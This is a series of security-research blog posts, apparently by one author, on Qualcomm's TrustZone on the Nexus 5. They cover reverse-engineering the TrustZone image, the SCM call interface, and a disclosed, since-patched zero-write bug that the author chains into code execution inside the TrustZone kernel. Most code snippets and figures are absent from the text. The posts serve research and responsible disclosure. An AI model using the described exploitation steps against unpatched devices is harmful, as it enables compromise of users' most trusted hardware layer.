In the previous blog post, we mentioned that all SCM calls are called indirectly via a large array containing, among other things, pointers to each of the SCM calls (along with the number of arguments they are provided, their name, etc.).

This means that we can use the write gadget we created previously in order to change the address of some SCM call which we deem to be "unimportant", to an address at which a write gadget already exists. Quickly going over the TrustZone kernel's code reveals that there are many such gadgets. Here's one example of such a gadget:

This piece of code will simply write the value in R0 to the address in R1, and return. Great.

Finally, it might also be handy to be able to read any memory location which is within the TrustZone kernel's virtual address space. This can be achieved by creating a read gadget, using the exact same method described above, in place of another "unimportant" SCM call. This gadget is actually quite a bit rarer than the write gadget. However, one such gadget was found within the TrustZone kernel:

This gadget returns the value read from the address in R0, with the offset R1. Awesome.

Writing new code

At this stage, we have full read-write access to the TrustZone kernel's memory. What we don't yet have, is the ability to execute arbitrary code within the TrustZone kernel. Of course, one might argue the we could find different gadgets within the kernel, and string those together to create any wanted effect. But this is quite tiring if done manually (we would need to find quite a few gadgets), and quite difficult to do automatically.

There are a few possible way to tackle this problem.

One possible angle of approach might be to write a piece of code in the "Normal World", and branch to it from the "Secure World". This sounds like an easy enough approach, but is actually much easier said than done.

As mentioned in the first blog post, when the processor in operating in secure mode, meaning the NS (Non-Secure) bit in the SCR (Secure Configuration Register) is turned off, it can only execute pages which are marked as "secure" in the translation table used by the MMU (that is, the NS bit is off).

This means that in order to execute our code chunk residing in the "Normal World" we would first have to modify the TrustZone kernel's translation table in order to map the address in which we've written our piece of code as secure.

While all this is possible, it is a little tiresome.

A different approach might be to write new code within the TrustZone kernel's code segments, or overwrite existing code. This also has the advantage of allowing us to modify existing behaviour in the kernel, which can also come in handy later on.

However, upon first glance this doesn't sound easier to accomplish than the previous approach. After all, the TrustZone kernel's code segments are mapped as read-only, and are certainly not writeable.

However, this is only a minor setback! This can actually be solved without modifying the translation table after all, by using a convenient feature of the ARM MMU called "domains".

In the ARM translation table, each entry has a field which lists its permissions, as well as a field denoting the "domain" to which the translation belongs. There are 16 domains, and each translation belongs to a single one of them.

Within the ARM MMU, there is a register called the DACR (Domain Access Control Register). This 32-bit register has 16 pairs of bits, one pair for each domain, which are used to specify whether faults for read access, write access, both, or neither, should be generated for translations of the given domain.

Whenever the processor attempts to access a given memory address, the MMU first checks if the access is possible using the access permissions of the given translation for that address. If the access is allowed, no fault is generated.

Otherwise, the MMU checks if the bits corresponding to the given domain in the DACR are set. If so, the fault is suppressed and the access is allowed.

This means that simply setting the DACR's value to 0xFFFFFFFF will actually cause the MMU to enable access to any mapped memory address, for both read and write access, without generating a fault (and more importantly, without having to modify the translation table).

But how can we set the DACR? Apparently, during the TrustZone kernel's initialization, it also explicitly sets the DACRs value to a predetermined value (0x55555555), like so:

However, we can simply branch to the next opcode in the initialization function, while supplying our own value in R0, thus causing the DACR to be set to our controlled value.

Now that the DACR is set, the path is all clear - we can simply write or overwrite code within the TrustZone kernel.

In order to make things a little easier (and less disruptive), it's probably better to write code at a location which is unused by the TrustZone kernel. One such candidate is a "code cave".

Code caves are simply areas (typically at the end allocated memory regions) which are unused (i.e., do not contain code), but are nonetheless mapped and valid. They are usually caused by the fact that memory mappings have a granularity, and therefore quite frequently there is internal fragmentation at the end of a mapped segment.

Within the TrustZone kernel there are several such code caves, which enable us to write small pieces of code within them and execute them, with minimal hassle.

Putting it all together

So this exploit was a little complex. Here's a run-down of all the stages we had to complete:

Disable the memory validation functions using the zero write primitive
Craft a wanted DWORD at a controlled location using the TrustZone PRNG
Verify the crafted DWORD by reading the corresponding version code
Write the crafted version code to the location of a function pointer to an existing SCM call (by doing so creating a fast write gadget)
Use the fast write gadget to create a read gadget
Use the fast write gadget to write a function pointer to a gadget which enables us to modify the DACR
Modify the DACR to be fully enabled (0xFFFFFFFF)
Write code to a code cave within the TrustZone kernel
Execute! :)

The Code

I've written an exploit for this vulnerability, including all the needed symbols for the Nexus 5 (with the fingerprint stated beforehand).

First of all, in order to enable the exploit to send the needed crafted SCM calls to the TrustZone kernel, I've created a patched version of the msm-hammerhead kernel which adds such functionality and exposes it to user-space Android.

I've chosen to do this by adding some new IOCTLs to an existing driver, QSEECOM (mentioned in the first blog post), which is a Qualcomm driver used to interface with the TrustZone kernel. These IOCTLs enable the caller to send a "raw" SCM call (either regular, or atomic) to the TrustZone kernel, containing any arbitrary data.

You can find the needed kernel modifications here.

For those of you using a Nexus 5 device, I personally recommend following Marcin Jabrzyk's great tutorial - here (it's a full tutorial describing how to compile and boot a custom kernel without flashing it to the device).

After booting the device with a modified kernel, you'll need a user-space application which can use the newly added IOCTLs in order to send SCMs to the kernel.

I've written such an application which you can get it here.

Finally, the exploit itself is written in python. It uses the user-space application to send SCM calls via the custom kernel directly to the TrustZone kernel, and allows execution of any arbitrary code within the kernel.

You can find the full exploit's code here.

Using the exploit

Using the exploit is pretty straight forward. Here's what you have to do:

Boot the device using the modified kernel (see Marcin's tutorial)
Compile the FuzzZone binary and place it under /data/local/tmp/
Write any ARM code within the shellcode.S file
Execute the build_shellcode.sh script in order to create a shellcode binary
Execute exploit.py to run your code within the TrustZone kernel

Affected Devices

At the time of disclosure, this vulnerability affected all devices with the MSM8974 SoC. I created a script to statically check the ROMs of many such devices before reporting the vulnerability, and found that the following devices were vulnerable:

Note: This vulnerability has since been fixed by Qualcomm, and therefore should not affect updated devices currently. Also, please note that the following is not an exhaustive list, by any measure. It's simply the result of my static analysis at the time.

 -Samsung Galaxy S5
 -Samsung Galaxy S5
 -Samsung Galaxy Note III
 -Samsung Galaxy S4 
 -Samsung Galaxy Tab Pro 10.1
 -Samsung Galaxy Note Pro 12.2
 -HTC One
 -LG G3
 -LG G2
 -LG G Flex 
 -Sony Xperia Z3 Compact 
 -Sony Xperia Z2 
 -Sony Xperia Z Ultra 
 -Samsung Galaxy S5 Active
 -Samsung Galaxy S5 TD-LTE
 -Samsung Galaxy S5 Sport
 -HTC One (E8)
 -Oneplus One
 -Acer Liquid S2
 -Asus PadFone Infinity
 -Gionee ELIFE E7
 -Sony Xperia Z1 Compact
 -Sony Xperia Z1s
 -ZTE Nubia Z5s
 -Sharp Aquos Xx 302SH
 -Sharp Aquos Xx mini 303SH
 -LG G Pro 2
 -Samsung Galaxy J
 -Samsung Galaxy Note 10.1 2014 Edition (LTE variant)
 -Samsung Galaxy Note 3 (LTE variant)
 -Pantech Vega Secret UP
 -Pantech Vega Secret Note
 -Pantech Vega LTE-A
 -LG Optimus Vu 3
 -Lenovo Vibe Z LTE
 -Samsung Galaxy Tab Pro 8.4
 -Samsung Galaxy Round
 -ZTE Grand S II LTE
 -Samsung Galaxy Tab S 8.4 LTE
 -Samsung Galaxy Tab S 10.5 LTE
 -Samsung Galaxy Tab Pro 10.1 LTE
 -Oppo Find 7 Qing Zhuang Ban
 -Vivo Xshoot Elite
 -IUNI U3
 -Hisense X1
 -Hisense X9T Pantech Vega Iron 2 (A910)
 -Vivo Xplay 3S
 -ZTE Nubia Z5S LTE
 -Sony Xperia Z2 Tablet (LTE variant)
 -Oppo Find 7a International Edition
 -Sharp Aquos Xx304SH
 -Sony Xperia ZL2 SOL25
 -Sony Xperia Z2a
 -Coolpad 8971
 -Sharp Aquos Zeta SH-04F
 -Asus PadFone S
 -Lenovo K920 TD-LTE (China Mobile version)
 -Gionee ELIFE E7L
 -Oppo Find 7
 -ZTE Nubia X6 TD-LTE 128 GB
 -Vivo Xshot Ultimate
 -LG Isai FL
 -ZTE Nubia Z7
 -ZTE Nubia Z7 Max
 -Xiaomi Mi 4
 -InFocus M810

Timeline

19.09.14 - Vulnerability disclosed
19.09.14 - Initial response from QC
22.09.14 - Issue confirmed by QC
01.10.14 - QC issues notice to customers
16.10.14 - QC issues notice to carriers, request for 14 days of embargo
30.10.14 - Embargo expires

I'd like to also point out that after reporting this issue to Qualcomm, I was informed that it has already been internally identified by them prior to my disclosure. However, these kinds of issues require quite a long period of time in order to push a fix, and therefore at the time of my research, the fix had not yet been deployed (at least, not to the best of my knowledge).

Last Words

I'd really like to hear some feedback from you, so please leave a comment below! Feel free to ask about anything.

Exploring Qualcomm's TrustZone implementation

2015-08-04T22:49:00.000+03:00

In this blog post, we'll be exploring Qualcomm's TrustZone implementation, as present on Snapdragon SoCs. If you haven't already, you might want to read the previous blog post, in which I go into some detail about TrustZone in general.

Where do we start?

First of all, since Qualcomm's TrustZone implementation is closed-source, and as far as I could tell, there are no public documents detailing its architecture or design, we will probably need to reverse-engineer the binary containing the TrustZone code, and analyse it.

Acquiring the TrustZone image

We can attempt to extract the image from two different locations; either from the device itself, or from a factory image of the device.

My personal Nexus 5 device was already rooted, so extracting the image from the device should be pretty straight forward. Since the image is stored on the eMMC chip, and the blocks and partitions of the eMMC chip are available under "/dev/block/platform/msm_sdcc.1", I could simply copy the relevant partition to my desktop (using "dd").

Moreover, the partitions have meaningfully named links to them under "/dev/block/platform/msm_sdcc.1/by-name":

As you can see, there are two partitions here, one named "tz" (short for TrustZone), and one named "tzb", which serves as a backup image to the "tz" image, and is identical to it.

However, having extracted the image this way, I was still rather unsatisfied, for two reasons:

Although the TrustZone image is stored on the eMMC chip, it could easily be made inaccessible to the "Normal World" (by requiring the AxPROT bit on the system bus to be set), or several parts of it could be missing.
Pulling the entire partition's data doesn't reveal information about the real (logical) boundary of the image, so it will require some extra work to determine where the image actually ends. (Actually, since the "tz" image is an ELF binary, its size is contained within the ELF header, but that's just a fluke on our part).

So, having extracted one image from the device, let's take a look at a factory image.

The Nexus 5's factory images are all available to download from Google. The factory image contains a ZIP with all the default images, and additionally contains the bootloader image.

After downloading the factory image and grepping for strings related to TrustZone, it quickly became apparent that the bootloader image contains the wanted code.

However, there was still a minor problem to solve here - the bootloader image was in an unknown format (although maybe some Google-fu could reveal the answers needed). Regardless, opening the file with a hex-editor and guessing at its structure revealed that the format is actually quite simple:

The bootloader file has the following structure:

Magic value ("BOOTLDR!") - 8 bytes
The number of images - 4 bytes
The offset from the beginning of the file to the beginning of the image's data - 4 bytes
The total size of the data contained in the images - 4 bytes
An array with a number of entries matching the "number of images" field, above. Each entry in the array has two fields:

The image name - 64 bytes (zero padded)
The image length - 4 bytes

As you can see in the image above, the bootloader image contains an image called "tz", which is the image we're after. In order to unpack this file, I've written a small python script (available here) which receives a bootloader image and unpacks all of the files contained within it.

After extracting the image, and comparing it to the one extracted previously from the device, I verified that they were indeed identical. So I guess this means we can now move on to examine the TrustZone image.

Fixing up the TrustZone image

First of all, examining the file reveals that it is in fact an ELF file, which is pretty good news! This means that the memory segments and their mapped addresses should be available to us.

After opening the file with IDA Pro and letting the auto-analysis to run for a while, I wanted to start reversing the file. However, surprisingly, there seemed to be a lot of branches to unmapped addresses (or rather, addresses that weren't contained within the "tz" binary).

After taking a closer look, it seemed as though all the absolute branches that pointed to invalid addresses were within the first code segment of the file, and they were pointing into high addresses that weren't mapped. Also, there were no absolute branches to the address of that first code segment.

This seemed a little fishy... So how about we take a look at the ELF file's structure? Executing readelf reveals the following:

There's a NULL segment mapped to a higher address, which actually corresponds with the address range to which the invalid absolute branches were pointing! The guys over at Qualcomm are sneaky pandas :)

Anyway, I made a rather safe guess, which is that the first code segment is in fact mapped to the wrong address, and should actually be mapped to the higher address - 0xFE840000. So naturally, I wanted to rebase the segment using IDA's rebase feature, but lo and behold! This causes IDA to crash spectacularly:

I'm actually not sure if this was intended as an anti-reversing feature by Qualcomm, or if the NULL segment is just a result of their internal build process, but this can be easily bypassed by fixing the ELF file manually. All that's required is to move the NULL segment to an unused address (since it is ignored by IDA anyway), and to move the first code segment from its wrong address (0xFC86000) to the correct address (0xFE840000), like so:

Now, after loading the image in IDA, all the absolute branches are valid! This means we can move on to analyse the image.

Analysing the TrustZone image

First, it should be noted that the TrustZone image is a rather large (285.5 KB) binary file, with quite a small amount of strings, and with no public documentation. Moreover, the TrustZone system is comprised of a full kernel with capabilities such as executing applications, and much more. So... it's not clear where we should start, as reversing the whole binary would probably take far too long.

Since we would like to attack the TrustZone kernel from the application processor, the largest attack surface would probably be the secure monitor calls which enable the "Normal World" to interact with the "Secure World".

It should be noted, of course, that there are other vectors with which we can interact with the TrustZone, such as shared memory or maybe even interrupt handling, but since these pose a much smaller attack-surface, it is probably better to start by analysing the SMC calls.

So how do we find where the TrustZone kernel handles the SMC calls? First of all, let's recall that when executing an SMC call, similarly to the handling of SVC calls (that is, regular system calls in the "Normal World"), the "Secure World" must register the address of the vector to which the processor will jump when such an instruction is encountered.

The "Secure World"'s equivalent is the MVBAR (Monitor Vector Base Address Register), which provides the address of the vector containing the handling functions for the different events which are handled by the processor in "Secure World".

Accessing the MVBAR is done using the MRC/MCR opcodes, with the following operands:

So this means we can simply search for an MCR opcode with the following operands in the TrustZone image, and we should be able to find the "Monitor Vector". Indeed, searching for the opcode in IDA returns the following match:

As you can see, the address of the "start" symbol (which is, by the way, the only exported symbol), is loaded into the MVBAR.

According to the ARM documentation, the "Monitor Vector" has the following structure:

Which means that if we look at the "start" symbol mentioned earlier, we can assign the following names to the addresses in that table:

Now, we can analyse the SMC_VECTOR_HANDLER function. Actually, this function is responsible for quite a few tasks; first, it saves all the state registers and the return address in a predefined address (in the "Secure World"), then, it switches over the stack to a preallocated area (also in the "Secure World"). Finally, after performing the necessary preparations, it goes on to analyse the operation requested by the user and operate according to it.

Since the code to issue SMCs is present in the Qualcomm's MSM branch of the Linux kernel, we can take a look at the format of commands which the "Normal World" can issue to the "Secure World".

SMC and SCM

Confusingly, Qualcomm chose to name the channel through which the "Normal World" interacts with the "Secure World" via SMC opcodes - SCM (Secure Channel Manager).

Anyway, as I've mentioned in the previous blog post, the "qseecom" driver is used to communicate with the "Secure World" using SCMs.

The documentation provided by Qualcomm in the relevant source files is quite extensive, and is enough to get quite a good grip on the format of SCM commands.

Putting it shortly, SCM commands fall into one of two categories:

Regular SCM Call - These calls are used when there is information that needs to be passed from the "Normal World" to the "Secure World", which is needed in order to service the SCM call. The kernel populates the following structure:

And the TrustZone kernel, after servicing the SCM call, writes the response back to the "scm_response" structure:

In order to allocate and fill these structures, the kernel may call the wrapping function "scm_call", which receives pointers to kernel-space buffers containing the data to be sent, the location to which the data should be returned, and most importantly, the service identifier and command identifier.

Each SCM call has a "category", which means which TrustZone kernel subsystem is responsible for handling that call. This is denoted by the service identifier. The command identifier is the code which specifies, within a given service, which command was requested.

After the "scm_call" function allocates and populates the "scm_command" and "scm_response" buffers, it calls an internal "__scm_call" function which flushes all the caches (inner and outer caches), and calls the "smc" function.

This last function actually executes the SMC opcode, transferring control to the TrustZone kernel, like so:

Note that R0 is set to 1, R1 is set to point to a local kernel stack address, which is used as a "context ID" for that call, and R2 is set to point to the physical address of the allocated "scm_command" structure.

This "magic" value set in R0 indicates that this is a regular SCM call, using the "scm_command" structure. However, for certain commands where less data is required, it would be rather wasteful to allocate all these data structures for no reason. In order to address this issue, another form of SCM calls was introduced.

Atomic SCM Call - For calls in which the number of arguments is quite low (up to four arguments), there exists an alternate way to request an SCM call.

There are four wrapper functions, "scm_call_atomic_[1-4]", which correspond to the number of arguments requested. These functions can be called in order to directly issue an SMC for an SCM call with the given service and command IDs, and the given arguments.

Here's the code for the "scm_call_atomic1" function:

Where SCM_ATOMIC is defined as:

Note that both the service ID and the command ID are encoded into R0, along with the number of arguments in the call (in this case, 1). This is instead of the previous "magic" value of 1 used for regular SCM calls.

This different value in R0 indicates to the TrustZone kernel that the following SCM call is an atomic call, which means that the arguments will be passed in using R2-R5 (and not using a structure pointed to by R2).

Analysing SCM calls

Now that we understand how SCM calls work, and we've found the handling function in the TrustZone kernel which is used to handle these SCM calls, we can begin disassembling the SCM calls to try and find a vulnerability in one of them.

I'll skip over most of the analysis of the SCM handling function, since most of it is boilerplate handling of user input, etc. However, After switching the stack over to the TrustZone area and saving the original registers with which the call was performed, the handling function goes on to process the service ID and the command ID in order to see which internal handling function should be called.

In order to easily map between the service and command IDs and the relevant handling function, a static list is compiled into the TrustZone image's data segment, and is referenced by the SCM handling function. Here is a short snipped from the list:

As you can see, the list has the following structure:

Pointer to the string containing the name of the SCM function
"Type" of call
Pointer to the handling function
Number of arguments
Size of each argument (one DWORD for each argument)
The Service ID and Command ID, concatenated into a single DWORD - For example, the "tz_blow_sw_fuse" function above, has the type 0x2002 which means it belongs to the service ID 0x20 and its command ID is 0x02.

Now all that's left is to start disassembling each of these functions, and hope to find an exploitable bug.

The Bug!

So after pouring over all of the aforementioned SMC calls (all 69 of them), I finally arrived at the following function:

Normally, when an SCM command is called using the regular SCM call mechanism, R0 will contain the "result address" which points to the "scm_response" buffer which was allocated by the kernel, but which is also validated by the TrustZone kernel to make sure it is actually a physical address within an "allowed" range - that is, a physical address which corresponds to the Linux kernel's memory, and not, for example, a memory location within the TrustZone binary.

This check is performed using an internal function which I will cover in more detail in the next blog post (so keep posted!).

But what happens if we use an atomic SCM call to execute a function? In that case, the "result address" used is the first argument passed by the atomic call.

Now - can you see the bug in the function above?

As opposed to other SCM handling functions, this function fails to validate the value in R0, the "result address", so if we pass in:

R1 as a non-zero value (in order to pass the first branch)
The fourth argument (which is passed in at var_1C above) is non-zero
R0 as any physical address, including an address within the range of the TrustZone address space

The function will reach the left-most branch in the function above, and write a zero DWORD at the address contained in R0.

Responsible Disclosure

I'd like to point out that I've responsibly disclosed this vulnerability to Qualcomm eleven months ago, and the issue has been fixed by them (amazingly fast!). I'll share a detailed timeline and explanation in the next blog post, but I'd like to point out that the people at Qualcomm have been very responsive and a pleasure to work with.

What's next?

In the next blog post I will share a detailed (and quite complex!) exploit for the vulnerability described above, which enables full code execution within the TrustZone kernel. I will also publish the full exploit code, so stay tuned!

Also, since this is only my second blog post, I'm really looking for some (any) input, specifically:

What should I write more (or less) about?
Blog design issues
Research ideas :)

Getting arbitrary code execution in TrustZone's kernel from any context

2015-03-28T03:02:00.001+03:00

(All the vulnerabilities have been responsibly disclosed and fixed. I will post the CVE IDs and timelines in the following posts.)

What's the Goal?

Transcendence. From Android, that is.

This is going to be a series of blog posts detailing a chain of vulnerabilities that I've discovered which will enable us to escalate our privileges from any user up to the highest privilege of all - executing our code within TrustZone itself.

Since I only have my personal Android device, a Nexus 5 powered by a Snapdragon 800 SoC, I will focus on the TrustZone platform present on my device - Qualcomm's TrustZone implementation.

It should be noted that Qualcomm's TrustZone platform is present on all devices powered by Qualcomm SoCs, however, they also allow OEMs to make modifications and additions to this platform, which I will go into in more detail in later blog posts.

Also, I believe objectively Qualcomm's TrustZone implementation is a good target since the Snapdragon SoCs are quite ubiquitous and can be found in a very wide range of devices (which isn't surprising, considering Qualcomm has a very large market share in the smartphone chipset market).

Android & Security

Over the years many security mechanisms have been added to Android, and existing ones have been improved.

While the underlying security architecture hasn't changed, the defences have become quite formidable on modern devices, to the point where gaining high privileges can become quite a difficult task, many times requiring more than a single vulnerability.

If you haven't already, I recommend that you read Google's "Android Security Overview", which explains the security architecture and lists most of the security mechanisms which are currently in use.

(For the rest of these blog posts, I'm going to assume that you are at least somewhat familiar with Android's security architecture).

What is TrustZone?

(First, an obligatory TrustZone schematic from ARM Ltd.)

According to ARM Ltd., TrustZone is:

"...a system-wide approach to security for a wide array of client and server computing platforms, including handsets, tablets, wearable devices and enterprise systems. Applications enabled by the technology are extremely varied but include payment protection technology, digital rights management, BYOD, and a host of secured enterprise solutions."

In short, this means TrustZone is a system which is meant to enable "secure execution" on a target device.

In order to execute secure TrustZone code, a specific processor is designated. This processor can execute both non-secure code (in the "Normal World") and secure code (in the "Secure World"). All other processors are limited to the "Normal World" only.

TrustZone is used for various purposes on Android devices, for example:

Verifying kernel integrity (TIMA)
Using the Hardware Credential Storage (used by "keystore", "dm-verity")
Secure Element Emulation for Mobile Payments
Implementing and managing Secure Boot
DRM (e.g. PlayReady)
Accessing platform hardware features (e.g. hardware entropy)

In order to secure the whole system, and not just the application processor, specific bits on the system bus are set when entering "Secure World" and unset when returning to the "Normal World".

Peripherals are able to access the state of these bits and therefore can deduce whether or not we are currently running in the secure world or not.

How does TrustZone's security model work?

ARM also has a short technical overview of how TrustZone's Secure Model works, which is worth a read.

To achieve secure execution, the boundary between TrustZone and non-TrustZone code must be defined. This is achieved by defining two "worlds" - "Secure World" (TrustZone) and "Normal World" (in our case, Android).

As you know, when in the "Normal World" there is a security boundary between code running in "User-mode" and code running in "Supervisor-mode" (Kernel-mode).

The distinction between the different modes is managed by the Current Program Status Register (CPSR):

The five mode bits (marked by "M" in the image above), control the current execution mode. In the case of the Linux kernel, User Mode (b10000) is used for regular user code, and Supervisor Mode (b10011) is used for kernel code.

And yet, there's something missing here - there's no bit to indicate what is the currently active "world". That is because there is a separate register used for that - the Secure Configuration Register (SCR):

This register is a co-processor register, in CP15 c1, which means it can be accessed using the MRC/MCR opcodes.

As with the CPSR register, the "Normal World" cannot modify the SCR register directly. It can, however, execute an SMC opcode, which is the equivalent of a SWI for regular supervisor mode calls. SMC is short for Supervisor Mode Call, and is the opcode which can be used to issue requests directly to the TrustZone kernel.

Also, it should be noted that the SMC opcode can only be called from a supervisor context, which means that regular user code cannot use the SMC opcode.

In order to actually call TrustZone related functionality, the supervisor code, in our case, the Linux kernel, must register some sort of service which can be used to call the relevant SMC calls when needed.

In the case of Qualcomm, this is achieved by a device driver called "qseecom" - short for Qualcomm Secure Execution Environment Communication. We'll talk more about this driver in the later blog posts, so hang tight.

Putting it all together

So the road ahead is pretty long - in order to get to TrustZone code execution from a user-mode Android application with no permissions, we'll need the following privilege escalation vulnerabilities:

Escalation from an Android application with no permissions to a privileged Android user.
Escalation from a privileged Android user to code execution in the Linux kernel.
Escalation from the Linux kernel to code execution in the TrustZone kernel.

So if this seems like it might interest you, keep reading!

In the next blog post, I'll cover more details about Qualcomm's TrustZone implementation, and the vulnerability I discovered and exploited within its kernel.

attribute((constructor))

2014-10-25T00:55:00.000+03:00

I just started this blog to talk about a few things I like (and I hope you will too!).

I'll be focusing on Android, Mobile Security, and anything else security-related that I fiddle with in my spare time.

As embargoes expire, I will share vulnerabilities that I have discovered, detailed exploits for those I find interesting, and a few security research tools that I've developed.

Feel free to contact me by leaving a message on the blog or by emailing me at laginimaineb (at) gmail. If you have an idea for an interesting research topic that you think I should cover - I'm always happy to hear about it (especially if it's Android-related).

P.S - I might also share a few pictures of my dog. So there's that.